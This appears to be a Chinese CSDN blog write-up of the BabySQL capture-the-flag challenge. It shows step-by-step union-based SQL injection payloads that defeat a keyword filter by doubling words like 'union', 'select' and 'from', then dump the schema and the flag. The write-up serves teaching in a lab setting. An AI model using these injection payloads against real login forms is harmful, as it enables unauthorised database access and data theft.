web 18.babysql

最新推荐文章于 2022-03-03 11:32:37 发布
最新推荐文章于 2022-03-03 11:32:37 发布
阅读量135 收藏
点赞数
文章标签: 其他
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yu_jing_hong/article/details/120033463
版权

题目提示有过滤,首先尝试万能密码登录

可以根据错误提示知道or被过滤掉了,可以尝试双写绕过

 

果然没这么简单得到flag,再尝试注入

猜字段,构造payload:?username=-1' union select 1,2,database() %23 &password=1'+oorr 1='1

又提示错误,肯定是union select被过滤了,双写绕过

payload:?username=-1' uniunionon seselectlect 1,2,3 %23 &password=1'+oorr 1='1

再 爆库名,payload:?username=-1' uniunionon seselectlect 1,2,database() %23 &password=1'+oorr 1='1

再看一下其他数据库名payload:?username=-1' uniunionon seselectlect 1,2,group_concat(table_schema) from infoorrmation_schema.tables %23 &password=1'+oorr 1='1 

 from被过滤了,双写绕过

 

最右边有一个名为ctf的表,爆表名

payload:?username=-1' uniunionon seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema='ctf' %23 &password=1'+oorr 1='1

确定flag就在这张表里

确定列名,payload:?username=-1' uniunionon seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema='ctf' aandnd table_name='Flag'%23 &password=1'+oorr 1='1

 最后,拿到flag,payload:?username=-1' uniunionon seselectlect 1,2,flag frfromom ctf.Flag %23 &password=1'+oorr 1='1 

flag{151e9e1d-5cd1-4ba9-a36c-dc443466a92b}

yu_jing_hong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[极客大挑战 2019] web题-BabySQL
BROTHERYY的博客
07-08 264
复现环境:buuoj.cn 他又来了,上次被日了,这次还是要被日 发现被过滤了 用双写绕过 获取所有数据库 获取ctf库中所有的表 获取表内字段 获取表内数据 flag{85f76441-5982-4c33-975e-23a8f7365874}
BUUCTF WEB BabySql
qq_41696858的博客
09-03 291
题其实没什么,就是一个双写绕过waf的问题 按照常理,admin’ 123监测是否单引号闭合,直接给出注入点,且有回显 经过测试,waf过滤了or,by那么爆破列数的时候(直接输入order by 1会回显der 1): admin’ oorrder bbyy 1# 测试到4的时候会出现unknown_column,那么列数是3 -1’ ununionion selselectect 1,2,3# 下面爆破数据库,union select同样被过滤,同样双写 -1’ ununionion selselect
web-[GXYCTF2019]BabySQli
wojiushilsy的博客
07-06 297
题目要点题目内容解题 题目要点 当查询的数据不存在的时候,联合查询就会构造一个虚拟的数据。 题目内容 解题 原题目描述:刚学完sqli,我才知道万能口令这么危险,还好我进行了防护,还用md5哈希了密码! 查看源码search.php看到MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5 base32+base64解密后得到select * from user .
BUU_web [极客大挑战 2019]BabySQL
qq_46635165的博客
09-28 197
打开解题网址,一个账号密码输入框,根据题目,显然是sql注入: 尝试以 admin ,弱密码登录: 发现是get传参,提示登录错误用户或密码,进行抓包,并尝试单引号报错,找到报错显示位: %23尝试闭合语句,闭合成功: 到这里,有个一点需要注意: 如果用 burpsuite 进行sql注入,那么语句里面包含的空格 或者 # 号需要进行手动url编码再写入payload,因为 burpsuite 上是直接以 url 传参,不会再对数据进行自动url编码;而如果是直接在输入框上做 sql 注入,则不用
BUUCTF WEB Babysqli1
qq_41696858的博客
10-18 194
这题考的是sql注入 打开场景,一个登录界面 先尝试下,admin’,根据回显判断,用户名是admin没错,而且是单引号闭合 尝试万能密码,admin’ or ‘1’=‘1,发现是don’t hack me看来是有waf 但是尝试union这类词,发现他能过waf,那么尝试联合注入看看 首先要确定列数,不幸的是order触发了waf,需要大小写绕过 admin’ Order by 3#和admin’ Order by4#回显不一样,那么可以确认是三列 下面确定admin在那一列, a’ union sele
webplugin.exe
11-08
浙江大华摄像头 web调用监控所需控件,下载之后双击安装即可 webplugin 3.1.0.4
web3.min.js
08-28
web3.min.js 直接引用,方便快捷,需要配合node.js等的请绕行 (是一个通过RPC 调用 和本地以太坊节点进行通信的js库。可以与任何暴露了RPC接口的以太坊节点连接。)
System.Web.Extensions.dll
07-18
Parser Error Message: Could not load file or assembly 'System.Web.Extensions, Version=1.0.61025.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' or one of its dependencies. 系统找不到指定的文件。 ...
C#winform调用webapi.rar
05-12
JSON(JavaScript Object Notation)是一种轻量级的数据交换格式,常用于Web服务与客户端之间的数据传输。 在"C# WinForm调用WebAPI"的场景中,我们主要涉及到以下几个关键知识点: 1. **C# WinForm编程**:...
12-18web搭建.wmv
12-25
12-18web搭建.wmv
web学习之sql注入
weixin_45508323的博客
11-22 419
记我滴web学习--sql注入前言对sql注入原理的理解工具页面请求方式与注释请求方式:GET和POSTGET请求POST请求hackbarburp suite注释方式:#和--+判断注入点 前言 第一次写博客0.0,尝试梳理记录一下自己学习的知识点,也方便日后复习叭。 如果能帮到有需要的人那可真是太好了。 对sql注入原理的理解 sql 注入:即通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我认为sql注入就是将要注入的sql命令置于表单
h5怎么用mysql_HTML5 WebSQL四种基本操作的介绍
weixin_36356958的博客
02-06 333
本篇文章给大家带来的内容是关于HTML5 WebSQL四种基本操作的介绍,有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。Web SQL数据库API是一个独立的规范,在浏览器层面提供了本地对结构化数据的存储,已经被很多现代浏览器支持了。我们通过一个简单的例子来了解下如何使用Web SQL API在浏览器端创建数据库表并存储数据。var end;function setupDB() {...
QT属性动画--设置样式属性(其他属性)
lizequan的博客
03-02 5169
这里写自定义目录标题故事背景遇到的问题解决过程最终方法感悟 故事背景   最近在制作一个按钮切换的动画特效中接触了属性动画这部分内容,并由此产生了一些思考。 遇到的问题 解决过程 最终方法 感悟 ...
Volatile的其他特性
我想月薪过万的博客
03-03 3754
2.1 volatile总体概览 在上一节中,我们已经研究完了volatile可以实现并发下共享变量的可见性,volatile除了保证可见性外,volatile还具备如下一些突出的特性: volatile的原子性问题:volatile不能保证原子性操作 禁止指令重排序:volatile可以防止指令重排序操作 2.2 volatile不保证原子性 2.3 代码测试 package Ls; /** * 目标:研究Volatile的原子性操作 * <p> * 基本观点:V.
【安卓基础】Android直接通过路径来操作其他应用的私有目录,可以吗?
m0_48179608的博客
03-02 7468
在上篇文章[【安卓基础】一文搞懂Android历代版本文件访问权限变化](https://blog.csdn.net/m0_48179608/article/details/122838494)我们对同一个应用的的文件访问权限做了比较。 那么不同应用之间文件访问又有什么限制呢?我们准备分二到三篇文件来阐述。 这篇文章,主要来看下不同系统版本下,我们直接通过路径来访问其它应用的**内部存储、外部存储私有目录**,看看能不能访问以及不同系统版本的区别。
Silane-PEG-NHS,SIL-PEG-NHS,可以用来修饰蛋白质、多肽以及其他活性基团,NHS-PEG-Silane
qq_39152602的博客
03-03 3409
英文名称:Silane-PEG-NHS 中文名称:硅烷-聚乙二醇-活性酯 分子量:1k,2k,3.4k,5k,10k,20k(可按需定制) 质量控制:95%+ 存储条件:-20°C,避光,避湿 用 途:仅供科研实验使用,不用于诊治 外观: 固体或粘性液体,取决于分子量 注意事项:取用一定要干燥,避免频繁的溶解和冻干 溶解性:溶于大部分有机溶剂,如:DCM、DMF、DMSO、THF等等。在水中有很好的溶解性 取用:现配现用,将包装从冰箱中取出,置于干燥器中缓慢升至室温,打开瓶盖,取用。取用.
[Golang]力扣Leetcode—中级算法—其他—两整数之和(位运算)
皮埃尔的博客
03-03 2778
[Golang]力扣Leetcode—中级算法—其他—两整数之和(位运算)
项目部年度员工培训计划.docx
最新发布
07-13
项目部年度员工培训计划.docx
weboffice.ocx
08-16
weboffice.ocx是一种用于Web应用程序的ActiveX控件。它是由微软开发的,用于在网页上嵌入Office应用程序(如Word、Excel、PowerPoint等)的功能。 通过weboffice.ocx,用户可以在Web浏览器中打开、编辑和保存Office文件,而无需离开浏览器。这样,用户可以方便地在Web应用程序中查看和修改文档,而无需安装Office软件。 weboffice.ocx提供了丰富的API,使开发人员可以自定义和扩展Office的功能。开发人员可以使用weboffice.ocx实现与Office应用程序的集成,如创建和编辑文档模板、自定义工具栏和菜单、添加批注和注释等。 此外,weboffice.ocx还支持与其他Web技术的集成,如JavaScript和HTML5。开发人员可以使用这些技术来增强和扩展weboffice.ocx的功能,以满足更多的需求。 总的来说,weboffice.ocx是一款功能强大的ActiveX控件,它提供了在Web应用程序中使用Office功能的能力。它可以提高用户的工作效率,并为开发人员提供了丰富的扩展和定制选项。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值